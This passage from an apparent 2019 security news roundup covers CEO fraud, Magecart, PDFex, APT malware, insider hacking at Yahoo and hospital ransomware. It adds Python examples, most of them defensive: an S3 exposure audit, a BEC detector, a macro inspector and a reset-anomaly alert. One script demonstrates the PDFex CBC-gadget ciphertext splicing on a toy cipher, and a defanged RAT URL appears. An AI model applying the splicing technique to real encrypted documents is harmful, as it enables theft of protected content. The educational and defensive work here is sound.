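    """Combine the three views. A fully enabled Block Public Access setting
    overrides public ACLs and policies, so it decides the final verdict."""
    block = public_access_block or {}
    fully_blocked = all(block.get(k) for k in (
        "BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets"))
    findings = {
        "bucket": name,
        "public_policy": public_policy_statements(policy or {}),
        "public_acl": public_acl_grants(acl or {}),
        "block_public_access": fully_blocked,
    }
    findings["exposed"] = bool(findings["public_policy"] or findings["public_acl"]) and not fully_blocked
    return findings


# Constructed sample data (bucket name is only a label; ARNs and IDs are made up).
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::speechanalytics/*"},
    {"Sid": "Ops", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/ops"},
     "Action": "s3:*", "Resource": "arn:aws:s3:::speechanalytics/*"}
  ]}""")
SAMPLE_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
]}
NO_BLOCK = {k: False for k in ("BlockPublicAcls", "IgnorePublicAcls",
                               "BlockPublicPolicy", "RestrictPublicBuckets")}
FULL_BLOCK = {k: True for k in NO_BLOCK}

if __name__ == "__main__":
    print(audit_bucket("speechanalytics", SAMPLE_POLICY, SAMPLE_ACL, NO_BLOCK))
    print(audit_bucket("speechanalytics", SAMPLE_POLICY, SAMPLE_ACL, FULL_BLOCK))
```

The second call shows the cheapest fix: turning on all four Block Public Access settings at the account level makes the public statement and the AllUsers grant inert without anyone having to find and rewrite every bucket policy first.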

Wikipedia was the subject of a major DDoS attack, which affected the availability of the online encyclopaedia in the UK and parts of Europe. While the culprit(s) behind the attack remain unknown, Wikipedia was quick to condemn it, saying it was not just about taking Wikipedia offline: "Takedown attacks threaten everyone's fundamental rights to freely access and share information. We in the Wikimedia movement and Foundation are committed to protecting these rights for everyone."

CEO Fraud
The BBC News website published an article highlighting the all too common problem of CEO fraud, namely company email spoofing and fraud, which is costing businesses billions.

Criminals are increasingly targeting UK business executives and finance staff with 'CEO fraud', commonly referred to as 'whaling' or Business Email Compromise (BEC) by cybersecurity professionals. CEO fraud involves impersonating a senior company executive or a supplier to social engineer fraudulent payments. CEO fraud emails are difficult for cybersecurity defence technologies to prevent: they are crafted for individual recipients (i.e. spear phishing) and typically contain no malware-infected attachments or malicious web links for defences to detect and block, so detection has to rely on signals in the sender details and the message content instead.

Criminals do their research, gaining a thorough understanding of business executives, clients, suppliers, and even staff roles and responsibilities through websites and social media sites such as LinkedIn, Facebook, and Twitter. Once they determine who they need to target for the maximum likelihood of a financial return, they customise a social engineering communication to that individual, typically through email, but sometimes through text messages (i.e. smishing), over the phone, and even by postal letter to support the scam. They often create a tremendous sense of urgency, demanding immediate action to complete a payment while impersonating someone in the business with high authority, such as the MD or CEO. The criminal's ultimate goal is to pressure and rush the targeted staff member into authorising and making a payment to them. Such attacks are relatively simple to arrange, require little effort, and can have high financial rewards for criminals. They require little technical expertise, as email spoofing tools and instructions are freely available on the open and dark web. And thanks to the internet, fraudsters anywhere in the world can effortlessly target UK businesses with CEO fraud scams.
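Because these messages carry no attachment or link to block, a mail gateway has to score them on the sender and content signals the paragraphs above describe. The following is an added example of that triage logic (my own code, not from the BBC article or any product): it parses a few constructed messages and flags a display name that matches an executive but an address that does not, a Reply-To pointing at a different domain than From, a sender domain within a couple of edits of the company's own, and urgency wording. The domain `example.com`, the executive directory and the sample messages are all assumptions made for the example.

```python
import email
from email import policy
from email.utils import parseaddr

# Assumptions for this example: the organisation's own domain, a directory of
# executives likely to be impersonated, and a few pressure phrases.
INTERNAL_DOMAIN = "example.com"
EXECUTIVES = {"jane doe": "jane.doe@example.com"}
URGENCY_WORDS = ("urgent", "immediately", "wire transfer", "keep this confidential")


def edit_distance(a, b):
    """Levenshtein distance, used to spot look-alike domains (examp1e.com)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_lookalike(domain, legit=INTERNAL_DOMAIN):
    if domain == legit:
        return False
    # A small edit distance, or the classic "rn" standing in for "m".
    return edit_distance(domain, legit) <= 2 or domain.replace("rn", "m") == legit


def analyse(raw_message):
    """Return the list of BEC indicators found in one RFC 5322 message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    name, addr = parseaddr(str(msg.get("From", "")))
    addr = addr.lower()
    from_domain = addr.rpartition("@")[2]
    findings = []

    expected = EXECUTIVES.get(name.strip().lower())
    if expected and addr != expected:
        findings.append("display-name impersonation")

    _, reply_to = parseaddr(str(msg.get("Reply-To", "")))
    if reply_to and reply_to.lower().rpartition("@")[2] != from_domain:
        findings.append("reply-to domain mismatch")

    if is_lookalike(from_domain):
        findings.append("lookalike sender domain")

    text = (str(msg.get("Subject", "")) + " " + msg.get_payload()).lower()
    if any(w in text for w in URGENCY_WORDS):
        findings.append("urgency language")
    return findings


# Constructed sample messages (not real traffic).
SAMPLES = [
    "From: Jane Doe <ceo.jane@gmail.com>\nTo: accounts@example.com\n"
    "Subject: Urgent: wire transfer needed today\n\n"
    "I am in a meeting, please pay the attached invoice now.\n",
    "From: Jane Doe <jane.doe@examp1e.com>\nTo: accounts@example.com\n"
    "Subject: Supplier payment\n\nPlease process immediately and confirm.\n",
    "From: Bob Supplier <bob@partner.org>\nReply-To: accounts@partner-invoices.net\n"
    "To: accounts@example.com\nSubject: Updated bank details for invoice 4471\n\n"
    "Please use the new account below for future payments.\n",
    "From: Jane Doe <jane.doe@example.com>\nTo: accounts@example.com\n"
    "Subject: Lunch on Friday?\n\nAre you free?\n",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(analyse(raw) or ["clean"])
```

In production the same signals would be combined with SPF/DKIM/DMARC results and with whether the sender has written to the recipient before; the point of the example is that none of the indicators depends on a payload, which is why attachment and URL scanning alone misses this class of fraud.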

UK universities are being targeted by Iranian hackers in an attempt to steal secrets, according to the UK National Cyber Security Centre and the UK Foreign Office. The warning came after the US deputy attorney general Rod Rosenstein said: "Iranian nationals allegedly stole more than 31 terabytes of documents and data from more than 140 American universities, 30 American companies, five American government agencies, and also more than 176 universities in 21 foreign countries."

Security Updates
'Patch Tuesday' saw Microsoft release security updates for 78 vulnerabilities, including 17 rated 'Critical', affecting Windows RDP, Azure DevOps, SharePoint and Chakra Core.

On 23rd September 2019, Microsoft released an out-of-band ('emergency') update for Internet Explorer 9, 10 and 11 addressing a serious vulnerability (CVE-2019-1367) discovered by a Google researcher and reported to be actively exploited. The flaw allows an attacker to execute arbitrary code on a victim's computer via a specially crafted website, gaining the same rights as the current user, which is enough to install malware. It is particularly dangerous where the user has local administrator rights, as an attacker could then take full control of the computer remotely. Microsoft rates the vulnerability 'Critical' and it has a CVSS score of 7.6; Microsoft recommends that customers apply Critical updates immediately.

Ransomware
Research by AT&T Cybersecurity found that 58% of IT security professionals would refuse to pay following a ransomware attack, while 31% said they would only pay as a last resort and a further 11% considered paying the easiest way to get their data back; 40% would support outlawing ransomware payments altogether. It is clear from the latest threat intelligence reports that the paying of ransoms is fuelling further ransomware attacks, including targeted attacks on UK businesses.


#VB2019: Magecart Attack Groups Move to More Targeted Efforts

Speaking at the Virus Bulletin 2019 conference in London, Yonathan Klijnsma, head of threat research at RiskIQ, said that many groups had been identified behind recent Magecart attacks, but that a shift toward more targeted attacks was under way.

Klijnsma explained that traditional Magecart groups would get into a company's network, typically targeting e-commerce organizations, with only "25 lines of javascript." He said that the web skimmers worked on the server side, and that in 2016 RiskIQ observed more groups starting to do this, "and there are 15 active groups that we tracked."

Pointing to Group 6, on which IBM's X-Force published a report, Klijnsma said that "once they are in your network they will know more than you do, they are the admins you want to hire." The group later hit both Newegg and British Airways, having had access to the former for six months but, crucially, not being present during Black Friday, as they had been detected and removed by then.

Another, Group 5, are "experts in support," and Klijnsma said that RiskIQ knows of at least 20 suppliers that have been hit by this group. "They hit one supplier who had over 100,000 victim websites": a supplier compromise delivers malicious code to every customer site even though the supplier itself has no access to payment data.

A group that RiskIQ plans to reveal more details on in the coming months is Group 15, who Klijnsma said are "very specialized": they have built a framework for skimming and are able to remove a payment form and put their own in its place.

This, he said, was part of the evolution of the groups: they are doing more targeting and learning more about content management systems. In the case of the attack on Ticketmaster, access was gained through a compromise of the supplier Sociaplus that lasted from December 2017 to June 2018.

He described three main ways the groups get in: via outdated or misconfigured systems, via password reuse (the groups comb through breached credential lists), and via supply chain attacks on third-party code.

“The latter is not something people are talking about and while you want analytics and CDNs and services, they make you vulnerable and make your customers and visitors vulnerable to attack.”

PDFex attacks can exfiltrate content from encrypted PDF documents

Researchers from Ruhr University Bochum and Münster University of Applied Sciences have devised new attacks allowing them (and potential attackers) to recover the plaintext content of encrypted PDF documents. The attacks work against 27 widely used desktop and browser-integrated PDF viewers. The PDFex attacks (as the researchers collectively dubbed them) result in either direct exfiltration or exfiltration via CBC gadgets. Direct exfiltration attacks abuse the fact that some PDF readers don't encrypt the … More
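The "CBC gadget" in the second attack class is ordinary CBC malleability: PDF encryption uses AES in CBC mode with no integrity check, so anyone who knows the plaintext of one ciphertext block can splice in a ciphertext pair that decrypts to a block of their choosing, at the cost of turning the block before it into garbage. The following added example (my own code, not the researchers') shows the arithmetic. A tiny Feistel cipher stands in for AES so the file runs without third-party libraries; the key, the two-block "document" and the injected `/URI` string are constructed for the example and the real attack's placement of the garbage block inside tolerant PDF syntax is not modelled.

```python
import hashlib

BLOCK = 16
ROUNDS = 8


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    # Toy round function; a Feistel network is invertible whatever F is.
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for i in range(ROUNDS):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for i in reversed(range(ROUNDS)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right


def cbc_encrypt(key, iv, plaintext):
    assert len(plaintext) % BLOCK == 0, "example uses whole blocks, no padding"
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ciphertext):
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, block), prev))
        prev = block
    return b"".join(out)


def cbc_gadget(prev_block, cipher_block, known_plain, wanted_plain):
    """Attacker side, no key needed. In CBC, P_i = D(C_i) XOR C_{i-1}, so if
    P_i is known, replacing C_{i-1} with C_{i-1} XOR P_i XOR P' makes C_i
    decrypt to P'. The crafted block itself decrypts to garbage."""
    crafted_prev = _xor(_xor(prev_block, known_plain), wanted_plain)
    return crafted_prev + cipher_block


def demo():
    key, iv = b"viewer-derived-key", bytes(BLOCK)
    # Two-block plaintext; the second block is PDF syntax an attacker can predict.
    plaintext = b"%PDF-1.7 %secret" + b"/Contents (hide)"
    ciphertext = cbc_encrypt(key, iv, plaintext)
    known = plaintext[16:32]
    wanted = b"/URI (http://x/)"   # 16 bytes the attacker wants the viewer to see
    gadget = cbc_gadget(ciphertext[:16], ciphertext[16:32], known, wanted)
    # The victim's viewer decrypts the spliced-in gadget with the real key.
    recovered = cbc_decrypt(key, iv, gadget)
    return recovered[16:32] == wanted, recovered[:16] != plaintext[:16]


if __name__ == "__main__":
    print(demo())   # (True, True): injected block appears, preceding block is garbage
```

The fix is not a different viewer but integrity protection: an authenticated mode (AES-GCM) or a MAC over the ciphertext would reject the spliced blocks before anything is rendered, which the PDF encryption format does not provide.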

The post PDFex attacks can exfiltrate content from encrypted PDF documents appeared first on Help Net Security.

New Research into Russian Malware

There's some interesting new research about Russian APT malware:

The Russian government has fostered competition among the three agencies, which operate independently from one another, and compete for funds. This, in turn, has resulted in each group developing and hoarding its tools, rather than sharing toolkits with their counterparts, a common sight among Chinese and North Korean state-sponsored hackers.

"Every actor or organization under the Russian APT umbrella has its own dedicated malware development teams, working for years in parallel on similar malware toolkits and frameworks," researchers said.

"While each actor does reuse its code in different operations and between different malware families, there is no single tool, library or framework that is shared between different actors."

Researchers say these findings suggest that Russia's cyber-espionage apparatus is investing a lot of effort into its operational security.

"By avoiding different organizations re-using the same tools on a wide range of targets, they overcome the risk that one compromised operation will expose other active operations," researchers said.

This is no different from the US. The NSA malware released by the Shadow Brokers looked nothing like the CIA "Vault 7" malware released by WikiLeaks.

The work was done by Check Point and Intezer Labs. They have a website with an interactive map.

#VB2019: NCSC Reflects on Three Years of Countering and Attribution

As it prepares to mark its third anniversary of opening, the National Cyber Security Centre (NCSC) has said that defending the UK is a team effort and encouraged more businesses to work with it.

Speaking at the Virus Bulletin 2019 conference in London, director of operations at the NCSC Paul Chichester, reflected on the work done to create the NCSC, and how UK businesses needed to work alongside it.

Chichester explained that the momentum for a response center began in the 2000s, when the attackers targeting the UK were looked at more closely; today "there are 20 nation state threats that we track", and while the NCSC does not track all threats or compete with commercial companies, it can "understand additional insights."

He said that, with 20 years of capability and insight into threats to the UK, government funding in 2010 led to the development of the NCSC, which addressed the "obvious flaws in the approach that the UK took," in particular that there was no single place to go to report issues.

Admitting that the work of the NCSC will not stop the UK being an interest for attackers, Chichester pointed out that it is able to counter threats. “Our work in the past has been on observing threats, and our view is that it is not about counting but countering the threat,” he added. 

He also said that, as the NCSC is responsible for attribution, the UK government understands the context of threats and can assess them as they pertain to the UK. "Also, we don't respond with a red button, but by helping people, reporting to the victim and doing victim notification," he continued, adding that the NCSC does "a huge amount of work in the UK and works with organizations to help them recover. Attribution is an art, not a science."

He concluded his talk by saying that the NCSC wants to collaborate more, and work with people in the industry “and for us it is a team sport and please talk to us - we care about the things you care about.”

Later speaking to Infosecurity, Chichester said that the efforts undertaken by the NCSC include doing formal attribution, and protecting the anonymity of the organizations it protects. As part of this, it feeds tactical intelligence via its CISP and partner channels, and he said that companies are often not judged by the compromise, “but how they deal with it.”

Asked if businesses are coming to the NCSC to collaborate, Chichester said they are “massively” and this is fundamental for the business. “We want people to come to us to get insight into threats at a macro level, and we want to work with organizations to help us understand what they are seeing and doing [regarding] incident response.”

Cyber Security Today – October cyber security awareness month, ransomware statistics and lots of security updates to watch out for

October cyber security awareness month, ransomware statistics and lots of security updates to watch out for. Welcome to Cyber Security Today. It’s Wednesday October 2nd, I’m Howard Solomon, contributing reporter on cyber security for ITWorldCanada.com.     October is cyber security awareness month. I assume listeners to this podcast worry about cyber security. Good. But…

A Look Into Continuous Efforts By Chinese Hackers to Target Foreign Governments

Phishing is still one of the most widely used strategies by cybercriminals and espionage groups to gain an initial foothold on targeted systems. Though hacking someone with phishing attacks was easy a decade ago, the evolution of threat detection technologies and cyber awareness among people has reduced the success of phishing and social engineering attacks over the years. Since phishing

Asics apologizes after pornography ran on screens at central store in Auckland for hours

NZ Sports Store Apologises Over Porn Played on Big Screens

Hackers broadcast pornographic content on large television screens above the Asics central store in Auckland for several hours.

The New Zealand branch of sports brand Asics has apologised for an embarrassing incident over the weekend. On Sunday, hackers broadcast pornographic content on large television screens above the Asics central Auckland store for several hours.

The pornography may have run on Asics's outdoor screens for up to nine hours; it was noticed by shop staff around 10am on Sunday, when the store opened to the public.

Security officer Dwayne Hinango confirmed that the video played for almost two hours, but some witnesses said it had been running since 1am.

“An Asics store manager has apologised and says a full investigation is under way after pornography appeared on large TV screens above its Auckland central shop.” reported the New Zealand Herald.

“The store manager, who gave his name only as John, said the incident happened because of a cybersecurity breach – he was “100 per cent sure” the explicit videos had not been uploaded by one of his staff.”

Some people walking near the Asics store were shocked, including a mother that was with her seven-year-old son that defined the explicit content as “totally inappropriate and offensive.”

According to a post published by Asics New Zealand on Facebook, an attacker gained unauthorized access to its internal televisions.

“We would like to apologise to anyone who may have seen this.” states the post.

Asics confirmed that it is working with online security suppliers to secure its systems and prevent similar incidents in the future.

Pierluigi Paganini

(SecurityAffairs – vBulletin, data breach)

The post Asics apologizes after pornography ran on screens at central store in Auckland for hours appeared first on Security Affairs.

Attackers Targeting U.S. Petroleum Companies with Adwind RAT

Digital criminals have launched a new attack campaign targeting U.S. petroleum companies with the Adwind RAT. Netskope discovered the operation at the beginning of September and found that it was distributing the Adwind RAT from "members[.]westnet[.]com[.]au/~joeven/." With this URL in mind, it's likely that the individual responsible for the campaign either […]… Read More

The post Attackers Targeting U.S. Petroleum Companies with Adwind RAT appeared first on The State of Security.

Two-Thirds of Firms Have Suffered ERP Data Breaches

Nearly two-thirds of businesses which rely on SAP or Oracle have suffered a breach of their ERP systems in the past two years, according to new research from Onapsis.

The security vendor commissioned IDC to poll 430 IT decision makers knowledgeable about their organization's ERP applications.

Of the 64% that have suffered a breach of SAP or Oracle E-Business Suite (EBS), sales data (50%) was most commonly compromised, followed by HR data (45%), personal customer information (41%), intellectual property (36%) and financial data (34%).

The range of sensitive information listed above highlights the crucial role security teams have in protecting ERP applications, especially considering that, on average, three-quarters (74%) of these ERP applications were internet connected.

“ERP applications can be foundational for businesses. A breach of such critical ERP applications can lead to unexpected downtime, increased compliance risk, diminished brand confidence and project delays,” said Frank Dickson, program vice-president, cybersecurity products with IDC.

“Cyber-miscreants seem to be indiscriminate when it comes to ERP systems, having an appetite for all types of data, which, if in the wrong hands, could be detrimental to the business in terms of revenue and reputation.”

The high volume of breaches is somewhat at odds with another finding: that 78% of respondents audit their ERP applications at least every 90 days.

Larry Harrington, former chairman of the Global Board of the Institute of Internal Auditors (IIA), said the findings should raise questions at a board level about the quality of such audits.

“The lack of these controls is one way for cyber insurance companies to deny claims,” he warned. “The information compromised most often according to this research is the highest regulated in today’s business ecosystem. Most concerning is the popularity of sales, financial data and PII, all of which should raise flags about the possibility of insider trading, collusion and fraud.”

Urgent11 flaws affect more medical, industrial devices than previously thought

When, in late July, Armis researchers revealed the existence of the so-called Urgent11 vulnerabilities in Wind River’s VxWorks real-time operating system, they noted that RTOS offerings by other vendors might also be vulnerable. As it turns out, they were right: the flaws are also present in some versions of the following real-time operating systems:

  • OSE by ENEA
  • INTEGRITY by Green Hills
  • Nucleus RTOS by Mentor
  • ITRON by TRON Forum
  • ZebOS by IP Infusion

(The researchers … More

The post Urgent11 flaws affect more medical, industrial devices than previously thought appeared first on Help Net Security.

WEF: Cyber-Attacks Are Biggest Business Risk in Europe and US

Cyber-attacks remained the biggest perceived risk of doing business for executives in North America and Europe, and second globally, according to an annual World Economic Forum (WEF) report published yesterday.

Compiled from the responses of over 12,900 executives in 133 countries, the Regional Risks for Doing Business 2019 report outlines “the five global risks that you believe to be of most concern for doing business in your country within the next 10 years.”

Cyber-attacks were pegged as the biggest risk by executives in six of the world’s 10 largest economies (the US, Germany, the UK, France, Italy and Canada) as well as in six other European countries.

Data fraud or theft was put in seventh place in terms of most concerning business risks for global respondents.

“The fact that cyber-threats worry the business community as much as they do academia, civil society, governments and other thought leaders shows just how disruptive this risk is to all aspects of life,” the report noted.

“As economies and societies continue to digitize, cyber-attacks are both more lucrative for attackers and more dangerous for victims.”

The WEF report highlighted the emergence of “formjacking” or Magecart attacks, alongside cryptojacking and the persistent threat of ransomware including the major losses suffered by Norsk Hydro as contributing to CEO unease over cyber-threats.

Some 61% of European businesses reported cyber-incidents in 2019 compared to 45% the previous year, according to insurer Hiscox.

In the US, the report pointed to a spate of ransomware attacks on local government authorities across the country and concerns over the security of election systems.

“Cybersecurity remains the most concerning risk to business leaders in advanced economies, and growing technology dependence for many businesses will only amplify this,” argued John Drzik, president of global risk and digital at Marsh.

“Combined with fractious geopolitical developments, and growing economic concerns, executives face a very challenging portfolio of potential threats. Business leaders should re-evaluate their underlying view of the global risk environment and make greater efforts to strengthen their corporate agility and resilience.”

How SMBs Can Mitigate the Growing Risk of File-based Attacks

Cases of document-based malware are steadily rising: 59 percent of all malicious files detected in the first quarter of 2019 were delivered inside documents. Given how work is done in today's offices and workplaces, companies are among those most commonly affected by file-based attacks. Since small to medium businesses (SMBs) usually lack the kind of security that protects their larger counterparts,
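A check an SMB can run itself, before an attachment reaches a user, is to look inside Office files for the parts that carry executable content rather than trusting the file extension. The following added example (my own code, not from the article or any product) inspects an OOXML package for a VBA project, a macro-enabled content type, embedded OLE objects and external link parts, and recognises the legacy OLE2 container so it can be routed to a dedicated tool. The sample documents are built in memory by `build_sample` and are deliberately minimal stand-ins, not real Word files; the placeholder `vbaProject.bin` contains no actual VBA.

```python
import io
import zipfile

MACRO_CONTENT_TYPES = (
    "application/vnd.ms-word.document.macroEnabled.main+xml",
    "application/vnd.ms-word.template.macroEnabledTemplate.main+xml",
    "application/vnd.ms-excel.sheet.macroEnabled.main+xml",
    "application/vnd.ms-powerpoint.presentation.macroEnabled.main+xml",
)
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls/.ppt container


def inspect_office_file(data):
    """Return a list of findings for an Office file supplied as bytes.
    The extension is ignored on purpose: attackers rename .docm to .doc or
    .rtf, and a gateway that trusts the extension misses it."""
    if data.startswith(OLE2_MAGIC):
        return ["legacy OLE2 container: inspect with olefile/oletools for VBA streams"]
    if not data.startswith(b"PK"):
        return ["not an OOXML or OLE2 document"]
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = [n.lower() for n in z.namelist()]
        if any(n.endswith("vbaproject.bin") for n in names):
            findings.append("VBA project part present")
        try:
            content_types = z.read("[Content_Types].xml").decode("utf-8", "replace")
        except KeyError:
            content_types = ""
        if any(ct in content_types for ct in MACRO_CONTENT_TYPES):
            findings.append("macro-enabled content type")
        if any("/embeddings/" in n for n in names):
            findings.append("embedded OLE object")
        if any("/externallinks/" in n for n in names):
            findings.append("external link part")
    return findings


def build_sample(with_macro, with_embedding=False):
    """Construct a minimal OOXML package in memory (a stand-in, not a real Word file)."""
    main_ct = (MACRO_CONTENT_TYPES[0] if with_macro else
               "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types><Override PartName="/word/document.xml" ContentType="%s"/></Types>' % main_ct)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\x00" * 32)   # placeholder bytes, not real VBA
        if with_embedding:
            z.writestr("word/embeddings/oleObject1.bin", b"\x00" * 32)
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_office_file(build_sample(with_macro=True)))
    print(inspect_office_file(build_sample(with_macro=False)))
    print(inspect_office_file(build_sample(with_macro=False, with_embedding=True)))
```

A practical policy built on this is to quarantine anything with a VBA part or macro-enabled content type unless it comes from an allow-listed sender, and to treat embedded objects as a lower-severity flag, since they are common in legitimate documents but are also how many exploit payloads arrive.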

Former Yahoo Employee Pleads Guilty to Hacking Accounts

A former Yahoo employee has pleaded guilty to hacking thousands of customer accounts in search of sexual images and videos.

Reyes Daniel Ruiz, 34, of Tracy, California, admitted in a San Jose federal court on Monday to hacking around 6000 accounts — targeting those belonging to young women, including friends and colleagues.

He is said to have copied the content to a hard drive at home, which Ruiz destroyed after his employer raised the alarm about suspicious activity.

It’s unclear exactly how he actually compromised the accounts, but the Department of Justice claimed he was first able to “crack” user passwords to access internal Yahoo systems.

Once inside, he was able to compromise other accounts, including iCloud, Facebook, Gmail and Dropbox, presumably by having password reset emails sent to the hacked Yahoo accounts.

Ruiz was charged with one count of computer intrusion and one count of interception of a wire communication. Under a plea agreement he admitted to the first charge, which carries a maximum sentence of five years behind bars plus a fine of $250,000.

Carl Wearn, head of e-crime at Mimecast, argued that all organizations should have measures in place to mitigate the insider threat, and claimed the incident shows that password resets represent a serious business risk.

“We need to make it harder for hackers to trickle into a number of systems from one weak point. A starting point is to monitor systems for unusual behavior. A pattern of multiple employees resetting passwords, for example, should trigger a warning,” he added.

“Additionally, there should always be multiple administrators so that access privileges are not abused. Businesses may not be able to prevent every employee from using their skills or access for malicious means, but they can put a plan in place for spotting and tackling such behavior.”
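The detection Wearn suggests is straightforward to implement against an identity provider's audit trail. The following added example (my own code, not Mimecast's or Yahoo's) reads a constructed key=value audit log, keeps a sliding window of password resets per acting account, and raises one alert when an actor resets five or more distinct accounts within an hour, tagging whether it happened out of hours. The log format, the actor names and the thresholds are assumptions made for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

LINE = re.compile(r"^(?P<ts>\S+) actor=(?P<actor>\S+) action=(?P<action>\S+) target=(?P<target>\S+)")

# Constructed audit log in a made-up key=value format (not any real system's).
AUDIT_LOG = """\
2019-09-30T09:58:10Z actor=helpdesk1 action=password_reset target=u1001 src=10.0.1.7
2019-09-30T11:20:44Z actor=helpdesk1 action=password_reset target=u1042 src=10.0.1.7
2019-09-30T15:03:02Z actor=helpdesk1 action=login target=- src=10.0.1.7
2019-09-30T16:47:19Z actor=helpdesk1 action=password_reset target=u1077 src=10.0.1.7
2019-10-01T02:11:05Z actor=eng42 action=password_reset target=u2001 src=10.0.9.21
2019-10-01T02:12:31Z actor=eng42 action=password_reset target=u2002 src=10.0.9.21
2019-10-01T02:13:58Z actor=eng42 action=password_reset target=u2003 src=10.0.9.21
2019-10-01T02:15:02Z actor=eng42 action=password_reset target=u2004 src=10.0.9.21
2019-10-01T02:16:40Z actor=eng42 action=password_reset target=u2005 src=10.0.9.21
2019-10-01T02:18:12Z actor=eng42 action=password_reset target=u2006 src=10.0.9.21
"""


def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return event


def detect_mass_resets(log_text, threshold=5, window_seconds=3600):
    """Alert once per actor who resets `threshold` or more distinct accounts
    within a sliding window. Helpdesk staff reset a few a day; one engineer
    resetting a batch at 2am is the pattern worth a phone call."""
    events = sorted((e for e in map(parse, log_text.splitlines()) if e), key=lambda e: e["ts"])
    recent = defaultdict(deque)
    alerts, already = [], set()
    for e in events:
        if e["action"] != "password_reset":
            continue
        window = recent[e["actor"]]
        window.append((e["ts"], e["target"]))
        while (e["ts"] - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        distinct = {target for _, target in window}
        if len(distinct) >= threshold and e["actor"] not in already:
            already.add(e["actor"])
            alerts.append({
                "actor": e["actor"],
                "accounts": len(distinct),
                "from": window[0][0].isoformat(),
                "to": e["ts"].isoformat(),
                "off_hours": not 7 <= e["ts"].hour < 20,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_mass_resets(AUDIT_LOG):
        print(alert)
```

The rule is deliberately simple so that its false-positive sources are obvious: a bulk reset after a breach, or a helpdesk queue worked by one person, will trip it, and those are the two cases an analyst should be asked to confirm anyway. Pairing it with Wearn's second point, that no single administrator should hold the reset privilege alone, means a genuine alert can be checked against a change ticket rather than against the actor's own word.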

Former Yahoo Employee Admits Hacking into 6000 Accounts for Sexual Content

An ex-Yahoo! employee has pleaded guilty to misusing his access at the company to hack into the accounts of nearly 6,000 Yahoo users in search of private and personal records, primarily sexually explicit images and videos. According to a press release from the U.S. Justice Department, Reyes Daniel Ruiz, a 34-year-old resident of California and former Yahoo software engineer, admitted

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

A new wave of ransomware attacks has hit US and Australian hospitals and health service providers, paralysing their systems.

Several hospitals and health service providers in the U.S. and Australia were hit by ransomware attacks that forced administrators to shut down part of their IT infrastructure.

“Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.” reported ArsTechnica.

“All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system.”

According to a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center and Fayette Medical Center, in Tuscaloosa, Northport and Fayette in West Alabama, have limited access to their computing systems.

“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”

Similar problems affected at least seven hospitals in Australia: the information technology systems at a number of hospitals and health services in Gippsland and south-west Victoria were impacted by a cyber security incident.

“A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.” reads the security advisory.

“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management. Hospitals have isolated and disconnected a number of systems such as internet to quarantine the infection.”

A couple of weeks ago, the Campbell County Memorial Hospital in Gillette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files. The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either: LabCorp and Hancock Health are only two of the most recently affected.

